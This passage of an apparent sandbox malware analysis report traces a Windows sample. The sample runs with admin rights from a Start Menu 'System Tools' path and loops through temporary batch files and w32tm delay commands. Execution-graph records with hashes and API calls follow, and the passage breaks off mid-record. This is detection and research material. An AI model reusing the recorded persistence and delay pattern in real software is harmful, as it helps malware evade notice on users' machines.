                                                        Commandline:"C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                                                        Imagebase:0x690000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:40
                                                        Start time:12:48:47
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:41
                                                        Start time:12:48:47
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:42
                                                        Start time:12:48:47
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7450c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:43
                                                        Start time:12:48:47
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\w32tm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        Imagebase:0x7ff791ec0000
                                                        File size:108'032 bytes
                                                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:44
                                                        Start time:12:48:52
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                                                        Imagebase:0xbe0000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:46
                                                        Start time:12:48:57
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:47
                                                        Start time:12:48:57
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:48
                                                        Start time:12:48:57
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7450c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:49
                                                        Start time:12:48:57
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\w32tm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        Imagebase:0x7ff791ec0000
                                                        File size:108'032 bytes
                                                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:50
                                                        Start time:12:49:03
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                                                        Imagebase:0xcc0000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:52
                                                        Start time:12:49:09
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:53
                                                        Start time:12:49:09
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:54
                                                        Start time:12:49:09
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7450c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:55
                                                        Start time:12:49:09
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\w32tm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        Imagebase:0x7ff791ec0000
                                                        File size:108'032 bytes
                                                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:56
                                                        Start time:12:49:14
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                                                        Imagebase:0x240000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:58
                                                        Start time:12:49:22
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCMSovEgtl.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:59
                                                        Start time:12:49:22
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true


                                                          Execution Graph

                                                          Execution Coverage:5.1%
                                                          Dynamic/Decrypted Code Coverage:25%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:12
                                                          Total number of Limit Nodes:0
                                                          Execution graph (image not preserved): nodes call GetFileAttributesW, SuspendThread, CloseHandle and ResumeThread.

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f72317af55d14f79b08b692b0f0507055bf10fedea4455e8a8b52dc59194e98
                                                          • Instruction ID: 88f4e80b73e556a328278fba7bcac0340ed2fb6b351cd33bce36753cf92878be
                                                          • Opcode Fuzzy Hash: 2f72317af55d14f79b08b692b0f0507055bf10fedea4455e8a8b52dc59194e98
                                                          • Instruction Fuzzy Hash: 8252AF3091C69A8FEB69DF18C4946B8B7B1FF45350F9041BDD45ECB286DA38A982CF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2341436525.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848a50000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1c8a48b190eaeb65ed604b86e85df0f60945106f062f8cae16d8b544fb82c616
                                                          • Instruction ID: 05fc6db45868e567eaa877bf63c11b57f973ddd080188248e3df48de79710e15
                                                          • Opcode Fuzzy Hash: 1c8a48b190eaeb65ed604b86e85df0f60945106f062f8cae16d8b544fb82c616
                                                          • Instruction Fuzzy Hash: C2A1BA71D19A8A8FE799EF68D8667BDBBE2FF55340F40017AC009D3296CBB81841CB51

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2341436525.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848a50000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: c9$!k9
                                                          • API String ID: 0-3254877420
                                                          • Opcode ID: b5293a7434c2eb1c95abdb56a9a2597856a7c3303bae22e3ac1a12a28f8e2189
                                                          • Instruction ID: 86a44485d89af8892086e1b288de4536267733db8421102018bdf8fd635dafbc
                                                          • Opcode Fuzzy Hash: b5293a7434c2eb1c95abdb56a9a2597856a7c3303bae22e3ac1a12a28f8e2189
                                                          • Instruction Fuzzy Hash: 95212772A1964E8FDB45EF1CD8825ED77A0FF55365F0001B6E849D3190D730A465CBC2

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Q^H
                                                          • API String ID: 0-138190856
                                                          • Opcode ID: a778157be66130ebdaf5de61a1724ad931eec40055be982aabeb10fb2aaefa2b
                                                          • Instruction ID: 19a56dc182c26c1777d8f68cbbe090b43ff17172a6408fa6936028a87dfb7968
                                                          • Opcode Fuzzy Hash: a778157be66130ebdaf5de61a1724ad931eec40055be982aabeb10fb2aaefa2b
                                                          • Instruction Fuzzy Hash: 31E1B635E1DACA8FE7A5EF288454678B7E2FF55350F5A00BAC40DC7292DE28AC45CB41

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 102 7ff848bfeb78-7ff848bfebb1 103 7ff848bfebb4-7ff848bfec82 ResumeThread 102->103 104 7ff848bfebb3 102->104 108 7ff848bfec84 103->108 109 7ff848bfec8a-7ff848bfecd4 103->109 104->103 108->109
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2343295650.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: f273f1629647d1d11bce511562ecfa617798d49d4638df3b8f8e7cd62bc983d0
                                                          • Instruction ID: 1cffeba17f23d784ac0df23f87dda38733eb1b05ca77dc1ebc39d8dd8164643c
                                                          • Opcode Fuzzy Hash: f273f1629647d1d11bce511562ecfa617798d49d4638df3b8f8e7cd62bc983d0
                                                          • Instruction Fuzzy Hash: 62516A7090C78C8FDB55DFA8D894AE8BFB0EF56310F1441ABD089DB292DA359846CB11

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 112 7ff848bfd35d-7ff848bfd369 113 7ff848bfd374-7ff848bfd442 SuspendThread 112->113 114 7ff848bfd36b-7ff848bfd373 112->114 118 7ff848bfd444 113->118 119 7ff848bfd44a-7ff848bfd494 113->119 114->113 118->119
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2343295650.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID: SuspendThread
                                                          • String ID:
                                                          • API String ID: 3178671153-0
                                                          • Opcode ID: d82bbfa5c6c70c5008edab6e40f641708c183ad0a117ee9bc1acdcc13270ed00
                                                          • Instruction ID: 4036433f121f9cd813728e14ad51b55eae75702e2d8154b77f6fb7f249f86cae
                                                          • Opcode Fuzzy Hash: d82bbfa5c6c70c5008edab6e40f641708c183ad0a117ee9bc1acdcc13270ed00
                                                          • Instruction Fuzzy Hash: 4B413B70D08A4D8FDB98EFA8D885BEDBBF0FB5A310F14416AD049E7252DB70A845CB45

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 122 7ff848c009f5-7ff848c00ad3 GetFileAttributesW 126 7ff848c00ad5 122->126 127 7ff848c00adb-7ff848c00b19 122->127 126->127
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2343295650.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: ca646256b7024d78408b7004232c33d7d845d48d798d9d8643366a96e2d67a86
                                                          • Instruction ID: fdc6c6ab3610cb0cd6f28c7c7c1a731cf4ccb18bbd914f9aa1cdc0414458fe3f
                                                          • Opcode Fuzzy Hash: ca646256b7024d78408b7004232c33d7d845d48d798d9d8643366a96e2d67a86
                                                          • Instruction Fuzzy Hash: 6C410870E0864C8FDB98EF98D885BEDBBF0FB5A310F10416AD009E7252DA719845CF41

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H
                                                          • API String ID: 0-2852464175
                                                          • Opcode ID: fc47d61a879fc5faab49cf257700e5e87ef0ca91fdbc72187b29c0a3372b8cf2
                                                          • Instruction ID: 822c501caf2aef13c30fe7af9083186eb95ef87f0471382eb4ea6766e8ccb695
                                                          • Opcode Fuzzy Hash: fc47d61a879fc5faab49cf257700e5e87ef0ca91fdbc72187b29c0a3372b8cf2
                                                          • Instruction Fuzzy Hash: 19719D70D5C58ACEEBA9EF648855ABCBBB1FF453A0F5500BAD00ED6186DE2C6841DB01

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: f7eb237b841facb7ea18cfdfa57903d9f1af2baa9e489d15995a5eddad15d0d7
                                                          • Instruction ID: d350be30c6297065bdb7380fa5d38a619143bbd186f41aaf10aa20107f44bedb
                                                          • Opcode Fuzzy Hash: f7eb237b841facb7ea18cfdfa57903d9f1af2baa9e489d15995a5eddad15d0d7
                                                          • Instruction Fuzzy Hash: F7514670D0D68A9FDB59EFA8C4556BDBBB1FF44350F5140BAC00AE7292CA386905CB40

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 214 7ff848bfecd9-7ff848bfece5 215 7ff848bfece7-7ff848bfecef 214->215 216 7ff848bfecf0-7ff848bfedc2 CloseHandle 214->216 215->216 220 7ff848bfedc4 216->220 221 7ff848bfedca-7ff848bfee1e 216->221 220->221
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2343295650.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: ef96afd458043f25dccb674cbca6b101d0f2416430537f4e1b5b4c5140e81fd1
                                                          • Instruction ID: 2840bd2b447f52491a8de417b075401e7a892b8a7eaa5358c66ae614711cc6f7
                                                          • Opcode Fuzzy Hash: ef96afd458043f25dccb674cbca6b101d0f2416430537f4e1b5b4c5140e81fd1
                                                          • Instruction Fuzzy Hash: 2E416D30D0865C8FDB58DFA8D885BEDBBF0EF56310F1041AAD449EB292CB349885CB11

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0S#I
                                                          • API String ID: 0-238827777
                                                          • Opcode ID: 41738cd27e3539208eaef1505bb7394e38b333945445919abd9454a580abaf01
                                                          • Instruction ID: e60fe4415ddfc6fbd8fa5b8484711ea2a0b22a5fe10f401b9f045ac7f192b488
                                                          • Opcode Fuzzy Hash: 41738cd27e3539208eaef1505bb7394e38b333945445919abd9454a580abaf01
                                                          • Instruction Fuzzy Hash: BB41F43194E3C94FE753AB34E8055F97FA0EB83374F0901FAD089CA0A3D6A95516CB52

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 17b7b954772f49ef2c62ec4fa3b9d27e7f53ce0f22fffca2edbf07ee0288dd7b
                                                          • Instruction ID: d567f0ad802dff9b2904b501b77597a8ba8b59d4039e57621db1129df3cb0386
                                                          • Opcode Fuzzy Hash: 17b7b954772f49ef2c62ec4fa3b9d27e7f53ce0f22fffca2edbf07ee0288dd7b
                                                          • Instruction Fuzzy Hash: 28412370D1C64ADFEB5AEFA8C4545BDBBB1FF08350F9140B9C00AA7282CA396942CF50

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0S#I
                                                          • API String ID: 0-238827777
                                                          • Opcode ID: 138baa4ec7ff16fcd9a09827c372a097ad4daf3745da4b2e905c8789547a1e77
                                                          • Instruction ID: fd548811f3aef506c52b0f5c02802c8578c2d209df5dff38b4dd03ec699976dc
                                                          • Opcode Fuzzy Hash: 138baa4ec7ff16fcd9a09827c372a097ad4daf3745da4b2e905c8789547a1e77
                                                          • Instruction Fuzzy Hash: 8C31F82094F3C98FE753AB34A8585E97FA1AF43374F1900FAD085CE4A3C69D0515CB52

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5878c0637fe6d19abd2b07f826865c5bbd221a6a8066fbd1a732ab74341edf6a
                                                          • Instruction ID: d6505e05a17d5d651c8293e47cba0008e18658ad5d815541ff509c7481c8a543
                                                          • Opcode Fuzzy Hash: 5878c0637fe6d19abd2b07f826865c5bbd221a6a8066fbd1a732ab74341edf6a
                                                          • Instruction Fuzzy Hash: 79227334A1CA5DCFDBA8EF18C895A79B3E2FF54351B5541B9D00EC7292DA28AC45CF80

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3546d12ddd94bf4fe053870f2c801b8e04f29c8811f976e94ebfa7ebd69cf408
                                                          • Instruction ID: e8d2615071285b478a4071d715bf69d2dcb9537fc3303338c3a14a34c82fcd60
                                                          • Opcode Fuzzy Hash: 3546d12ddd94bf4fe053870f2c801b8e04f29c8811f976e94ebfa7ebd69cf408
                                                          • Instruction Fuzzy Hash: D222B572D0E6D65FE712FF78A8A54F97FA0EF13398B0801FBD0888A093E91969458745

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 95689a1c728b5065ed02ee9be7f2a7a8a7d135d0958298c10a11fb9c7bc23932
                                                          • Instruction ID: 5ef5712217cb728cd5793c2f32a6af3254ec4632552c67bbd878fc9c4955e1bc
                                                          • Opcode Fuzzy Hash: 95689a1c728b5065ed02ee9be7f2a7a8a7d135d0958298c10a11fb9c7bc23932
                                                          • Instruction Fuzzy Hash: 5DE1E130A0DB968FE379EF28D491175B7E1FF443A0B15497EC49A836C6DA3DB8428B41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dd6cc87f65378f477a9a51b65bac3cc839e66ada45e7b021ed7d623f32f64615
                                                          • Instruction ID: 150b966b3410e64dfd6da3b1343f01b15501ea92f507123fe2adb9ccb7ae9d64
                                                          • Opcode Fuzzy Hash: dd6cc87f65378f477a9a51b65bac3cc839e66ada45e7b021ed7d623f32f64615
                                                          • Instruction Fuzzy Hash: FCD1D13051C5868FEB69DF18C4E06B17BA1FF45320B5545BDC85A8B68BC63CF881CB81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67e72896c446967db151e56a2dd0983958c4338625d9a364000c57f4fc958050
                                                          • Instruction ID: 8cdd90747e5de7a4e89f3c37d3754c1a3e89d7294c04d92c5d780f47a67ddc00
                                                          • Opcode Fuzzy Hash: 67e72896c446967db151e56a2dd0983958c4338625d9a364000c57f4fc958050
                                                          • Instruction Fuzzy Hash: F0C1D23055D5868FEB2DDF18C4E06B17BA1FF45360B5545BDC89A8B68BCA3CE881CB41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b502e1154b47b748978696bf7810176f4f2e030d68e6caef555c07443c4d64f
                                                          • Instruction ID: dd3826200729d52d149ec11799f17f4439053fbce3b9eef06229422057f80d55
                                                          • Opcode Fuzzy Hash: 9b502e1154b47b748978696bf7810176f4f2e030d68e6caef555c07443c4d64f
                                                          • Instruction Fuzzy Hash: 85319A31E0C5DA8EE6B4BE68A4511B8B7E0EF553E4F1541BAC00EC60C2CE2D68009B85
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30cc02662f57beeac68c7b85a4a466a0dca48fb9e242c9e643bb95413c128830
                                                          • Instruction ID: 3ec0d9da2f8049b45d4a6158c5709f1c1962ab63374c4da6b153de075e56925d
                                                          • Opcode Fuzzy Hash: 30cc02662f57beeac68c7b85a4a466a0dca48fb9e242c9e643bb95413c128830
                                                          • Instruction Fuzzy Hash: 86C1BF3051C696CFEB2DDF18C0A01B5B7A1FF45360B9545BDD89A8B68BCA3CE482CB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0361faedeeaf886d7c0a6b59c3623aa8c621fb00c7b9b15319af7842d3f47b09
                                                          • Instruction ID: f732ecfafd5723758a64dbdafa65acb7a90f9f4c1386ca9109266e088c6352a1
                                                          • Opcode Fuzzy Hash: 0361faedeeaf886d7c0a6b59c3623aa8c621fb00c7b9b15319af7842d3f47b09
                                                          • Instruction Fuzzy Hash: E8A1267590C8CA8FE778FF18C8555B5B7D0FF68360B5602B9D05EC36A2DE1CA9068B81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
